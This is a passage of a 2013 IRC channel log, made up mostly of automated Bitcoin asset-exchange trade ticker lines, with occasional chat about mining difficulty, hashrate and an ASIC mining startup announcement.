0.0419 BTC [+] Aug 10 22:43:26 [HAVELOCK] [XBOND] 1 @ 0.00104699 BTC [+] Aug 10 22:44:18 good for you Aug 10 22:44:28 you're helping stabilize mining Aug 10 22:45:15 http://bitbet.us/bet/508/btc-network-difficulty-to-top-500mn-before-xmas/#c1192 Aug 10 22:45:19 BitBet - BTC network difficulty to top 500MN before Xmas 2013 Aug 10 22:45:21 i wanna see that 1. Aug 10 22:46:09 [BTCTC] [LABCOIN] 5 @ 0.001305 = 0.0065 BTC [+] Aug 10 22:46:14 mining tech would have be like cents for the megahash, and a few watts to the 100's of megahash Aug 10 22:46:22 like little light bulbs Aug 10 22:47:13 [BTCTC] [LABCOIN] 15 @ 0.001304 = 0.0196 BTC [-] Aug 10 22:47:13 i don't think mining is necessarily related to reason. Aug 10 22:47:27 thestringpuller: i happen to know the buggest buyer... and am not sure if he stabilizes mining in any way Aug 10 22:47:36 *biggest lol Aug 10 22:47:37 for instance : imagine there's 100 people interested in mining, 1 unit of mining hashing and 100 units of minining available for sale. Aug 10 22:47:58 due to the autistic idiocy so speciffic to bitcoin, each of those 100 people will judge that adding 1 to 1 makes mining still worth it Aug 10 22:48:07 so EACH buys one, and then... 101 units are mining. Aug 10 22:48:44 [BTCTC] [ASICMINER-PT] 1 @ 3.825 BTC [+] Aug 10 22:50:40 and, with impeding abrupt 30% decline of profits, i'd be unsurprised to see hashpower to stagnate a bit Aug 10 22:50:49 *impending Aug 10 22:51:13 so we'll see who has last laugh Aug 10 22:52:44 [BTCTC] [DMS.MINING] 1 @ 0.004399 BTC [-] Aug 10 22:54:08 !last m X.IDIFF.SEP Aug 10 22:54:08 Last trade for X.IDIFF.SEP on MPEX was at 0.55 BTC [+] Aug 10 22:54:21 ^ this will be interesting too Aug 10 23:00:02 [BTCTC] [ACTIVEMINING] 30 @ 0.005505 = 0.1652 BTC [+] Aug 10 23:00:03 [BTCTC] [ACTIVEMINING] 20 @ 0.005504 = 0.1101 BTC [-] Aug 10 23:04:24 [BTCTC] [BTCGARDEN] 1 @ 0.0159 BTC [+] Aug 10 23:04:24 [BTCTC] [BTCGARDEN] 11 @ 0.016 = 0.176 BTC [+] Aug 10 23:04:26 [BTCTC] [BTCGARDEN] 882 @ 0.01606 = 14.1649 BTC [+] Aug 10 23:04:27 [BTCTC] [BTCGARDEN] 620 @ 0.01606 = 9.9572 BTC [+] Aug 10 23:04:28 [BTCTC] [BTCGARDEN] 120 @ 0.01606 = 1.9272 BTC [+] Aug 10 23:04:29 [BTCTC] [BTCGARDEN] 850 @ 0.01606 = 13.651 BTC [+] Aug 10 23:07:00 [BTCTC] [DMS.PURCHASE] 1 @ 0.02811 BTC [-] Aug 10 23:07:14 [BTCTC] [DMS.MINING] 139 @ 0.004399 = 0.6115 BTC [-] Aug 10 23:07:16 [BTCTC] [DMS.MINING] 150 @ 0.0044 = 0.66 BTC [+] Aug 10 23:07:17 [BTCTC] [DMS.MINING] 95 @ 0.00445 = 0.4228 BTC [+] Aug 10 23:07:18 [BTCTC] [DMS.MINING] 100 @ 0.00445 = 0.445 BTC [+] Aug 10 23:07:18 [BTCTC] [DMS.MINING] 168 @ 0.00449 = 0.7543 BTC [+] Aug 10 23:07:19 [BTCTC] [DMS.MINING] 100 @ 0.0045 = 0.45 BTC [+] Aug 10 23:07:20 [BTCTC] [DMS.MINING] 71 @ 0.004549 = 0.323 BTC [+] Aug 10 23:07:21 [BTCTC] [DMS.MINING] 200 @ 0.00455 = 0.91 BTC [+] Aug 10 23:07:22 [BTCTC] [DMS.MINING] 100 @ 0.0046 = 0.46 BTC [+] Aug 10 23:07:24 [BTCTC] [DMS.MINING] 200 @ 0.00465 = 0.93 BTC [+] Aug 10 23:07:25 [BTCTC] [DMS.MINING] 60 @ 0.00469 = 0.2814 BTC [+] Aug 10 23:07:26 [BTCTC] [DMS.MINING] 200 @ 0.00469 = 0.938 BTC [+] Aug 10 23:07:27 [BTCTC] [DMS.MINING] 250 @ 0.004699 = 1.1748 BTC [+] Aug 10 23:07:28 [BTCTC] [DMS.MINING] 100 @ 0.0047 = 0.47 BTC [+] Aug 10 23:07:29 [BTCTC] [DMS.MINING] 40 @ 0.00473 = 0.1892 BTC [+] Aug 10 23:07:29 [BTCTC] [DMS.MINING] 100 @ 0.00475 = 0.475 BTC [+] Aug 10 23:07:30 [BTCTC] [DMS.MINING] 260 @ 0.004797 = 1.2472 BTC [+] Aug 10 23:07:31 [BTCTC] [DMS.MINING] 100 @ 0.004798 = 0.4798 BTC [+] Aug 10 23:09:23 [BTCTC] [DMS.PURCHASE] 8 @ 0.02811 = 0.2249 BTC [-] Aug 10 23:10:04 [BTCTC] [DMS.MINING] 14 @ 0.004798 = 0.0672 BTC [+] Aug 10 23:10:06 [BTCTC] [DMS.MINING] 162 @ 0.004799 = 0.7774 BTC [+] Aug 10 23:13:56 mircea_popescu: http://techcrunch.com/2013/08/07/coinlab-the-bitcoin-incubator-announces-first-funded-company-alydian/ - more paul graham plz Aug 10 23:15:18 lolk Aug 10 23:15:23 what's it do ? Aug 10 23:18:59 "Alydian has developed an enterprise-scale Bitcoin mining system over the past year and we are excited to announce our capabilities today. The system, based on our first generation 65 nm custom ASIC technology, will enable non-technical customers to participate in terahash and petahash-scale Bitcoin mining without worry or technical expertise. Alydian will begin at-scale operation and hosting in late August." Aug 10 23:19:08 More ASICMINER clones. Aug 10 23:22:35 [BTCTC] [BITVPS] 249 @ 0.002036 = 0.507 BTC [+] Aug 10 23:23:10 [BTCTC] [BITVPS] 90 @ 0.002037 = 0.1833 BTC [+] Aug 10 23:23:11 [BTCTC] [BITVPS] 161 @ 0.00204 = 0.3284 BTC [+] Aug 10 23:23:29 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001601 = 0.1601 BTC [-] Aug 10 23:23:44 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.0016 = 0.48 BTC [-] Aug 10 23:24:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00159 BTC [-] Aug 10 23:24:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001504 BTC [-] Aug 10 23:24:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0015 BTC [-] Aug 10 23:24:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00149 BTC [-] Aug 10 23:24:10 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.001415 = 0.283 BTC [-] Aug 10 23:24:11 [BTCTC] [TAT.VIRTUALMINE] 850 @ 0.0014 = 1.19 BTC [-] Aug 10 23:27:19 ;;ticker Aug 10 23:27:20 MtGox BTCUSD ticker | Best bid: 102.50113, Best ask: 103.00000, Bid-ask spread: 0.49887, Last trade: 103.00000, 24 hour volume: 4730.74889013, 24 hour low: 101.93500, 24 hour high: 103.89999, 24 hour vwap: 102.78991 Aug 10 23:30:26 [BTCTC] [DMS.MINING] 15 @ 0.0045 = 0.0675 BTC [-] Aug 10 23:30:28 [BTCTC] [DMS.SELLING] 15 @ 0.024 = 0.36 BTC [-] Aug 10 23:30:30 [BTCTC] [DMS.PURCHASE] 15 @ 0.02811 = 0.4217 BTC [-] Aug 10 23:31:14 [BTCTC] [DMS.SELLING] 20 @ 0.024 = 0.48 BTC [-] Aug 10 23:31:16 [BTCTC] [DMS.PURCHASE] 20 @ 0.02811 = 0.5622 BTC [-] Aug 10 23:31:55 [BTCTC] [DMS.SELLING] 30 @ 0.024 = 0.72 BTC [-] Aug 10 23:31:57 [BTCTC] [DMS.PURCHASE] 30 @ 0.02811 = 0.8433 BTC [-] Aug 10 23:33:31 thestringpuller it's incredible how innovative these innovators are. Aug 10 23:33:50 late august being, of course, two weeks away. Aug 10 23:33:53 [BTCTC] [ASICMINER-PT] 1 @ 3.826 BTC [+] Aug 10 23:33:53 [BTCTC] [ASICMINER-PT] 1 @ 3.826 BTC [+] Aug 10 23:33:55 [BTCTC] [ASICMINER-PT] 1 @ 3.83 BTC [+] Aug 10 23:33:56 [BTCTC] [ASICMINER-PT] 1 @ 3.842 BTC [+] Aug 10 23:33:59 [BTCTC] [ASICMINER-PT] 1 @ 3.78 BTC [-] Aug 10 23:34:21 [HAVELOCK] [XBOND] 1 @ 0.001045 BTC [-] Aug 10 23:34:24 [MPEX] [S.MPOE] 5600 @ 0.00083282 = 4.6638 BTC [-] Aug 10 23:34:58 [HAVELOCK] [XBOND] 21 @ 0.00104499 = 0.0219 BTC [-] Aug 10 23:35:21 [HAVELOCK] [XBOND] 49 @ 0.00104499 = 0.0512 BTC [-] Aug 10 23:38:25 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.0014 = 0.0532 BTC [-] Aug 10 23:38:42 [HAVELOCK] [XBOND] 1 @ 0.00104499 BTC [-] Aug 10 23:40:46 [HAVELOCK] [XBOND] 2592 @ 0.00104499 = 2.7086 BTC [-] Aug 10 23:41:05 Hmm. In crytpo-news: Both RSA and Diffie-Hellman encryption rely on there being no efficient algorithm for that problem, but French math professor Antoine Joux has published two papers in the last six months that suggest one could soon be found. Security researchers that noticed Joux's work recommend companies large and small begin planning to move to elliptic curve cryptography, something the NSA has said is best practice for years. Unfortunat Aug 10 23:43:24 [HAVELOCK] [XBOND] 5 @ 0.00104699 = 0.0052 BTC [+] Aug 10 23:48:49 [BTCTC] [ACTIVEMINING] 1 @ 0.005554 BTC [+] Aug 10 23:56:36 [BTCTC] [DMS.SELLING] 8 @ 0.024 = 0.192 BTC [-] Aug 10 23:56:47 [BTCTC] [ASICMINER-PT] 1 @ 3.843 BTC [+] Aug 10 23:56:48 [BTCTC] [ASICMINER-PT] 2 @ 3.844 = 7.688 BTC [+] Aug 10 23:56:48 [BTCTC] [ASICMINER-PT] 3 @ 3.845 = 11.535 BTC [+] Aug 10 23:56:49 [BTCTC] [ASICMINER-PT] 1 @ 3.87 BTC [+] Aug 10 23:56:51 [BTCTC] [ASICMINER-PT] 1 @ 3.875 BTC [+] Aug 10 23:56:52 [BTCTC] [ASICMINER-PT] 1 @ 3.885 BTC [+] Aug 10 23:56:54 [BTCTC] [ASICMINER-PT] 5 @ 3.895 = 19.475 BTC [+] Aug 10 23:56:55 [BTCTC] [ASICMINER-PT] 9 @ 3.899 = 35.091 BTC [+] Aug 10 23:58:15 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001774 BTC [+] Aug 10 23:59:45 [BTCTC] [BTCGARDEN] 1 @ 0.0161 BTC [+] Aug 11 00:03:11 [BTCTC] [BASIC-MINING] 1 @ 0.3154 BTC [+] Aug 11 00:08:07 [BTCTC] [LABCOIN] 2 @ 0.001284 = 0.0026 BTC [-] Aug 11 00:11:16 [HAVELOCK] [XBOND] 100 @ 0.00104499 = 0.1045 BTC [-] Aug 11 00:13:24 [HAVELOCK] [XBOND] 200 @ 0.00104499 = 0.209 BTC [-] Aug 11 00:21:23 [BTCTC] [DMS.PURCHASE] 60 @ 0.02811 = 1.6866 BTC [-] Aug 11 00:21:36 [BTCTC] [LABCOIN] 59 @ 0.001277 = 0.0753 BTC [-] Aug 11 00:24:27 [BTCTC] [ACTIVEMINING] 4 @ 0.005549 = 0.0222 BTC [-] Aug 11 00:24:39 ;;nethash Aug 11 00:24:39 384588.812623 Aug 11 00:25:03 [MPEX] [S.MPOE] 10700 @ 0.00083491 = 8.9335 BTC [+] Aug 11 00:25:04 [MPEX] [S.MPOE] 9400 @ 0.00083504 = 7.8494 BTC [+] Aug 11 00:25:42 [BTCTC] [DMS.SELLING] 60 @ 0.024 = 1.44 BTC [-] Aug 11 00:28:24 [BTCTC] [DMS.MINING] 20 @ 0.004223 = 0.0845 BTC [-] Aug 11 00:28:26 [BTCTC] [DMS.MINING] 40 @ 0.004222 = 0.1689 BTC [-] Aug 11 00:30:21 [BTCTC] [BFMINES] 1 @ 0.003799 BTC [+] Aug 11 00:30:24 [BTCTC] [ACTIVEMINING] 14 @ 0.005549 = 0.0777 BTC [-] Aug 11 00:30:58 [BTCTC] [BFMINES] 1 @ 0.0038 BTC [+] Aug 11 00:39:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001777 BTC [+] Aug 11 00:40:33 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0019 = 0.019 BTC [+] Aug 11 00:43:57 [BTCTC] [BTCGARDEN] 30 @ 0.01589 = 0.4767 BTC [-] Aug 11 00:43:59 [BTCTC] [BTCGARDEN] 6 @ 0.01589 = 0.0953 BTC [-] Aug 11 00:44:00 [BTCTC] [BTCGARDEN] 70 @ 0.01588 = 1.1116 BTC [-] Aug 11 00:44:01 [BTCTC] [BTCGARDEN] 50 @ 0.01588 = 0.794 BTC [-] Aug 11 00:44:02 [BTCTC] [BTCGARDEN] 20 @ 0.01585 = 0.317 BTC [-] Aug 11 00:44:04 [BTCTC] [BTCGARDEN] 250 @ 0.01585 = 3.9625 BTC [-] Aug 11 00:44:04 [BTCTC] [BTCGARDEN] 63 @ 0.01584 = 0.9979 BTC [-] Aug 11 00:44:05 [BTCTC] [BTCGARDEN] 200 @ 0.01584 = 3.168 BTC [-] Aug 11 00:44:06 [BTCTC] [BTCGARDEN] 17 @ 0.0158 = 0.2686 BTC [-] Aug 11 00:44:07 [BTCTC] [BTCGARDEN] 200 @ 0.01565 = 3.13 BTC [-] Aug 11 00:44:08 [BTCTC] [BTCGARDEN] 400 @ 0.01565 = 6.26 BTC [-] Aug 11 00:46:14 [BTCTC] [DMS.SELLING] 10 @ 0.024 = 0.24 BTC [-] Aug 11 00:46:38 [BTCTC] [DMS.SELLING] 15 @ 0.02438 = 0.3657 BTC [+] Aug 11 00:46:39 [BTCTC] [DMS.SELLING] 75 @ 0.02438 = 1.8285 BTC [+] Aug 11 00:46:41 [BTCTC] [DMS.SELLING] 206 @ 0.02448 = 5.0429 BTC [+] Aug 11 00:47:17 [BTCTC] [ACTIVEMINING] 25 @ 0.005549 = 0.1387 BTC [-] Aug 11 00:47:18 [BTCTC] [ACTIVEMINING] 85 @ 0.00555 = 0.4718 BTC [+] Aug 11 00:47:20 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Aug 11 00:47:35 [BTCTC] [DMS.PURCHASE] 75 @ 0.02811 = 2.1083 BTC [-] Aug 11 00:48:17 [BTCTC] [ACTIVEMINING] 1 @ 0.00555 BTC [+] Aug 11 00:51:36 [BTCTC] [NASTY-PT] 100 @ 0.004 = 0.4 BTC [-] Aug 11 00:52:19 [BTCTC] [DMS.MINING] 1 @ 0.00433 BTC [+] Aug 11 00:53:13 [BTCTC] [ASICMINER-PT] 1 @ 3.902 BTC [+] Aug 11 00:53:28 [BTCTC] [DMS.MINING] 10 @ 0.00433 = 0.0433 BTC [+] Aug 11 00:55:14 [BTCTC] [ACTIVEMINING] 8 @ 0.0055 = 0.044 BTC [-] Aug 11 00:55:15 [BTCTC] [ACTIVEMINING] 6 @ 0.0054 = 0.0324 BTC [-] Aug 11 00:55:17 [BTCTC] [ACTIVEMINING] 16 @ 0.005348 = 0.0856 BTC [-] Aug 11 00:55:17 [BTCTC] [ACTIVEMINING] 75 @ 0.005347 = 0.401 BTC [-] Aug 11 00:55:18 [BTCTC] [ACTIVEMINING] 6 @ 0.005344 = 0.0321 BTC [-] Aug 11 00:55:19 [BTCTC] [ACTIVEMINING] 6 @ 0.005337 = 0.032 BTC [-] Aug 11 00:55:20 [BTCTC] [ACTIVEMINING] 30 @ 0.005336 = 0.1601 BTC [-] Aug 11 00:55:21 [BTCTC] [ACTIVEMINING] 80 @ 0.005321 = 0.4257 BTC [-] Aug 11 00:55:23 [BTCTC] [ACTIVEMINING] 17 @ 0.005321 = 0.0905 BTC [-] Aug 11 00:55:24 [BTCTC] [ACTIVEMINING] 400 @ 0.00532 = 2.128 BTC [-] Aug 11 00:55:25 [BTCTC] [ACTIVEMINING] 983 @ 0.005313 = 5.2227 BTC [-] Aug 11 00:55:26 [BTCTC] [ACTIVEMINING] 310 @ 0.005312 = 1.6467 BTC [-] Aug 11 00:55:27 [BTCTC] [ACTIVEMINING] 3063 @ 0.00531 = 16.2645 BTC [-] Aug 11 00:55:33 [BTCTC] [LABCOIN] 1 @ 0.001297 BTC [+] Aug 11 00:57:04 [MPEX] [S.MPOE] 13550 @ 0.00083285 = 11.2851 BTC [-] Aug 11 00:57:05 [MPEX] [S.MPOE] 1549 @ 0.00083282 = 1.29 BTC [-] Aug 11 00:57:06 [MPEX] [S.MPOE] 551 @ 0.0008321 = 0.4585 BTC [-] Aug 11 00:57:58 [BTCTC] [PAJKA.BOND] 1 @ 0.01576 BTC [+] Aug 11 00:59:23 [BTCTC] [LABCOIN] 1 @ 0.001297 BTC [+] Aug 11 01:04:02 [BTCTC] [LABCOIN] 2 @ 0.001296 = 0.0026 BTC [-] Aug 11 01:04:04 [BTCTC] [LABCOIN] 19 @ 0.001297 = 0.0246 BTC [+] Aug 11 01:05:25 [BTCTC] [ACTIVEMINING] 8 @ 0.005344 = 0.0428 BTC [+] Aug 11 01:05:27 [BTCTC] [ACTIVEMINING] 50 @ 0.005342 = 0.2671 BTC [-] Aug 11 01:05:29 [BTCTC] [ACTIVEMINING] 50 @ 0.005325 = 0.2663 BTC [-] Aug 11 01:05:30 [BTCTC] [ACTIVEMINING] 200 @ 0.00532 = 1.064 BTC [-] Aug 11 01:05:31 [BTCTC] [ACTIVEMINING] 145 @ 0.005311 = 0.7701 BTC [-] Aug 11 01:09:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005311 = 0.1593 BTC [-] Aug 11 01:09:17 [BTCTC] [ACTIVEMINING] 1545 @ 0.00531 = 8.204 BTC [-] Aug 11 01:09:18 [BTCTC] [ACTIVEMINING] 23 @ 0.005271 = 0.1212 BTC [-] Aug 11 01:09:19 [BTCTC] [ACTIVEMINING] 116 @ 0.00527 = 0.6113 BTC [-] Aug 11 01:09:20 [BTCTC] [ACTIVEMINING] 40 @ 0.005251 = 0.21 BTC [-] Aug 11 01:09:22 [BTCTC] [ACTIVEMINING] 185 @ 0.00525 = 0.9713 BTC [-] Aug 11 01:11:32 [BTCTC] [BTCGARDEN] 28 @ 0.01604 = 0.4491 BTC [+] Aug 11 01:11:33 [BTCTC] [BTCGARDEN] 32 @ 0.01605 = 0.5136 BTC [+] Aug 11 01:13:24 [HAVELOCK] [XBOND] 2 @ 0.00104699 = 0.0021 BTC [+] Aug 11 01:15:34 [BTCTC] [DMS.MINING] 8 @ 0.00425 = 0.034 BTC [-] Aug 11 01:16:18 [BTCTC] [ASICMINER-PT] 1 @ 3.899 BTC [-] Aug 11 01:24:27 [BTCTC] [DMS.PURCHASE] 25 @ 0.02811 = 0.7028 BTC [-] Aug 11 01:26:55 [BTCTC] [S.MPOE-PT] 5 @ 0.00096 = 0.0048 BTC [+] Aug 11 01:29:50 [BTCTC] [COGNITIVE] 2 @ 0.389 = 0.778 BTC [-] Aug 11 01:30:30 [BTCTC] [BASIC-MINING] 1 @ 0.3154 BTC [+] Aug 11 01:32:33 [BTCTC] [ACTIVEMINING] 1 @ 0.005534 BTC [+] Aug 11 01:33:37 [BTCTC] [ACTIVEMINING] 9 @ 0.005531 = 0.0498 BTC [-] Aug 11 01:37:21 [BTCTC] [BASIC-MINING] 15 @ 0.3001 = 4.5015 BTC [-] Aug 11 01:37:24 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1996 BTC [+] Aug 11 01:37:37 [BTCTC] [BASIC-MINING] 90 @ 0.3 = 27 BTC [-] Aug 11 01:37:55 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.001879 = 0.0564 BTC [-] Aug 11 01:38:16 [BTCTC] [COGNITIVE] 1 @ 0.341 BTC [-] Aug 11 01:38:17 [BTCTC] [COGNITIVE] 4 @ 0.3403 = 1.3612 BTC [-] Aug 11 01:38:19 [BTCTC] [COGNITIVE] 60 @ 0.34 = 20.4 BTC [-] Aug 11 01:47:32 [HAVELOCK] [XBOND] 2 @ 0.00104699 = 0.0021 BTC [+] Aug 11 01:53:39 [HAVELOCK] [XBOND] 110 @ 0.00104699 = 0.1152 BTC [+] Aug 11 01:53:56 [HAVELOCK] [XBOND] 500 @ 0.001047 = 0.5235 BTC [+] Aug 11 01:54:07 [HAVELOCK] [XBOND] 300 @ 0.001047 = 0.3141 BTC [+] Aug 11 01:54:16 [HAVELOCK] [XBOND] 6 @ 0.001047 = 0.0063 BTC [+] Aug 11 01:54:22 [HAVELOCK] [XBOND] 50 @ 0.001047 = 0.0524 BTC [+] Aug 11 01:54:29 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 11 01:57:15 [HAVELOCK] [VTX] 2 @ 0.48 = 0.96 BTC [-] Aug 11 01:57:19 [BTCTC] [S.MPOE-PT] 1 @ 0.00096 BTC [+] Aug 11 02:12:07 [BTCTC] [BTCGARDEN] 1 @ 0.01605 BTC [+] Aug 11 02:12:44 [BTCTC] [LABCOIN] 2 @ 0.001306 = 0.0026 BTC [+] Aug 11 02:12:46 [BTCTC] [DMS.MINING] 60 @ 0.00426 = 0.2556 BTC [+] Aug 11 02:13:14 [BTCTC] [DMS.SELLING] 60 @ 0.024 = 1.44 BTC [-] Aug 11 02:14:14 [BTCTC] [LABCOIN] 2 @ 0.001306 = 0.0026 BTC [+] Aug 11 02:16:17 [BTCTC] [LABCOIN] 2 @ 0.001306 = 0.0026 BTC [+] Aug 11 02:16:33 [BTCTC] [LABCOIN] 9 @ 0.001306 = 0.0118 BTC [+] Aug 11 02:20:16 [BTCTC] [BTCGARDEN] 28 @ 0.01571 = 0.4399 BTC [-] Aug 11 02:20:49 [BTCTC] [BTCGARDEN] 120 @ 0.0157 = 1.884 BTC [-] Aug 11 02:20:50 [BTCTC] [BTCGARDEN] 80 @ 0.01565 = 1.252 BTC [-] Aug 11 02:20:52 [BTCTC] [BTCGARDEN] 79 @ 0.01563 = 1.2348 BTC [-] Aug 11 02:20:53 [BTCTC] [BTCGARDEN] 350 @ 0.01561 = 5.4635 BTC [-] Aug 11 02:20:54 [BTCTC] [BTCGARDEN] 142 @ 0.01561 = 2.2166 BTC [-] Aug 11 02:20:54 [BTCTC] [BTCGARDEN] 71 @ 0.0156 = 1.1076 BTC [-] Aug 11 02:20:55 [BTCTC] [BTCGARDEN] 460 @ 0.0156 = 7.176 BTC [-] Aug 11 02:21:39 [BTCTC] [BTCGARDEN] 28 @ 0.0156 = 0.4368 BTC [-] Aug 11 02:21:41 [BTCTC] [BTCGARDEN] 80 @ 0.01559 = 1.2472 BTC [-] Aug 11 02:21:42 [BTCTC] [BTCGARDEN] 5 @ 0.01554 = 0.0777 BTC [-] Aug 11 02:21:43 [BTCTC] [BTCGARDEN] 30 @ 0.01553 = 0.4659 BTC [-] Aug 11 02:21:45 [BTCTC] [BTCGARDEN] 10 @ 0.01553 = 0.1553 BTC [-] Aug 11 02:21:46 [BTCTC] [BTCGARDEN] 895 @ 0.01552 = 13.8904 BTC [-] Aug 11 02:21:47 [BTCTC] [BTCGARDEN] 76 @ 0.01551 = 1.1788 BTC [-] Aug 11 02:21:48 [BTCTC] [BTCGARDEN] 1149 @ 0.0155 = 17.8095 BTC [-] Aug 11 02:21:49 [BTCTC] [BTCGARDEN] 727 @ 0.0155 = 11.2685 BTC [-] Aug 11 02:22:15 [BTCTC] [BTCGARDEN] 4 @ 0.01551 = 0.062 BTC [+] Aug 11 02:22:16 [BTCTC] [BTCGARDEN] 1996 @ 0.0155 = 30.938 BTC [-] Aug 11 02:26:48 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 11 02:30:04 [BTCTC] [LABCOIN] 2 @ 0.001304 = 0.0026 BTC [-] Aug 11 02:31:19 [BTCTC] [ACTIVEMINING] 2 @ 0.005387 = 0.0108 BTC [-] Aug 11 02:39:50 [HAVELOCK] [SMG] 566 @ 0.00022 = 0.1245 BTC [-] Aug 11 02:48:23 [MPEX] [S.MPOE] 18894 @ 0.00083236 = 15.7266 BTC [+] Aug 11 02:49:57 difficulty is going to entirely bypass the 40 millions Aug 11 02:52:07 ;;estimate Aug 11 02:52:07 Next difficulty estimate | None based on data since last change | 53797619.2868 based on data for last three days Aug 11 02:52:21 ;;nethash Aug 11 02:52:22 385104.23529 Aug 11 02:52:42 If the hash rate keeps going up like this the difficulty will spike again next tick. Aug 11 02:54:24 [HAVELOCK] [VTX] 2 @ 0.48 = 0.96 BTC [-] Aug 11 02:54:54 [HAVELOCK] [AM100] 1 @ 0.0364 BTC [-] Aug 11 02:55:44 [BTCTC] [DMS.MINING] 6 @ 0.00425 = 0.0255 BTC [-] Aug 11 02:55:45 [BTCTC] [DMS.MINING] 58 @ 0.004224 = 0.245 BTC [-] Aug 11 03:00:21 [HAVELOCK] [XBOND] 61 @ 0.00104499 = 0.0637 BTC [-] Aug 11 03:14:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.03795 = 0.1139 BTC [+] Aug 11 03:15:09 [BTCTC] [LABCOIN] 17 @ 0.0013 = 0.0221 BTC [-] Aug 11 03:16:10 [BTCTC] [LABCOIN] 2 @ 0.0013 = 0.0026 BTC [-] Aug 11 03:18:10 [BTCTC] [ACTIVEMINING] 3 @ 0.005493 = 0.0165 BTC [+] Aug 11 03:19:45 [MPEX] [S.MPOE] 17500 @ 0.00083268 = 14.5719 BTC [+] Aug 11 03:22:31 [BTCTC] [DMS.MINING] 1 @ 0.004729 BTC [+] Aug 11 03:25:48 [BTCTC] [S.MPOE-PT] 3 @ 0.00096 = 0.0029 BTC [+] Aug 11 03:27:25 [BTCTC] [DMS.MINING] 20 @ 0.004225 = 0.0845 BTC [-] Aug 11 03:27:27 [BTCTC] [DMS.SELLING] 20 @ 0.0243 = 0.486 BTC [+] Aug 11 03:27:29 [BTCTC] [DMS.PURCHASE] 20 @ 0.02811 = 0.5622 BTC [-] Aug 11 03:28:06 [BTCTC] [DMS.MINING] 45 @ 0.004224 = 0.1901 BTC [-] Aug 11 03:28:08 [BTCTC] [DMS.SELLING] 45 @ 0.0243 = 1.0935 BTC [+] Aug 11 03:28:10 [BTCTC] [DMS.PURCHASE] 45 @ 0.02811 = 1.265 BTC [-] Aug 11 03:28:47 [BTCTC] [DMS.MINING] 15 @ 0.004224 = 0.0634 BTC [-] Aug 11 03:28:49 [BTCTC] [DMS.SELLING] 15 @ 0.0243 = 0.3645 BTC [+] Aug 11 03:28:50 [BTCTC] [DMS.PURCHASE] 15 @ 0.02811 = 0.4217 BTC [-] Aug 11 03:28:53 [HAVELOCK] [AM1] 2 @ 3.89 = 7.78 BTC [-] Aug 11 03:29:28 [BTCTC] [DMS.MINING] 5 @ 0.004224 = 0.0211 BTC [-] Aug 11 03:29:36 [HAVELOCK] [HIM] 1 @ 0.134966 BTC [-] Aug 11 03:29:40 [BTCTC] [DMS.PURCHASE] 5 @ 0.02811 = 0.1406 BTC [-] Aug 11 03:30:15 [MPEX] [S.MPOE] 4900 @ 0.00083236 = 4.0786 BTC [-] Aug 11 03:30:19 [BTCTC] [DMS.MINING] 50 @ 0.004224 = 0.2112 BTC [-] Aug 11 03:32:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0017 BTC [-] Aug 11 03:32:50 [BTCTC] [LABCOIN] 235 @ 0.001287 = 0.3024 BTC [-] Aug 11 03:32:52 [BTCTC] [LABCOIN] 500 @ 0.00128 = 0.64 BTC [-] Aug 11 03:40:25 [BTCTC] [TAT.ASICMINER] 67 @ 0.03793 = 2.5413 BTC [-] **** BEGIN LOGGING AT Sun Aug 11 12:19:56 2013 Aug 11 12:26:26 [BTCTC] [DMS.SELLING] 67 @ 0.02449 = 1.6408 BTC [+] Aug 11 12:26:27 [BTCTC] [DMS.SELLING] 20 @ 0.02449 = 0.4898 BTC [+] Aug 11 12:26:29 [BTCTC] [DMS.SELLING] 263 @ 0.0245 = 6.4435 BTC [+] Aug 11 12:43:11 [MPEX] [S.MPOE] 5500 @ 0.00082434 = 4.5339 BTC [+] Aug 11 12:47:40 [BTCTC] [BASIC-MINING] 1 @ 0.3151 BTC [+] Aug 11 12:52:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001515 BTC [-] Aug 11 12:55:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.03941 = 0.1182 BTC [+] Aug 11 12:56:02 [BTCTC] [ACTIVEMINING] 6 @ 0.005456 = 0.0327 BTC [+] Aug 11 12:56:12 [BTCTC] [ASICMINER-PT] 1 @ 3.79 BTC [+] Aug 11 12:57:26 [BTCTC] [ASICMINER-PT] 1 @ 3.79 BTC [+] Aug 11 12:59:01 [HAVELOCK] [SMG] 2 @ 0.0002101 = 0.0004 BTC [+] Aug 11 13:07:06 [HAVELOCK] [AM100] 5 @ 0.0349 = 0.1745 BTC [-] Aug 11 13:08:35 [HAVELOCK] [AM100] 2 @ 0.034875 = 0.0698 BTC [-] Aug 11 13:08:44 [HAVELOCK] [AM100] 13 @ 0.0348001 = 0.4524 BTC [-] Aug 11 13:13:40 ;;nethash Aug 11 13:13:40 399509.784618 Aug 11 13:13:44 ;;estimate Aug 11 13:13:44 Next difficulty estimate | None based on data since last change | 55810020.5729 based on data for last three days Aug 11 13:16:38 [BTCTC] [RSM] 7 @ 0.01051 = 0.0736 BTC [-] Aug 11 13:16:40 [BTCTC] [RSM] 1 @ 0.01051 BTC [-] Aug 11 13:16:41 [BTCTC] [RSM] 1 @ 0.01003 BTC [-] Aug 11 13:16:42 [BTCTC] [RSM] 1 @ 0.00976 BTC [-] Aug 11 13:16:43 [BTCTC] [RSM] 10 @ 0.0096 = 0.096 BTC [-] Aug 11 13:16:44 [BTCTC] [RSM] 37 @ 0.007201 = 0.2664 BTC [-] Aug 11 13:17:26 [BTCTC] [BFMINES] 70 @ 0.003874 = 0.2712 BTC [-] Aug 11 13:19:37 [MPEX] [S.MPOE] 14088 @ 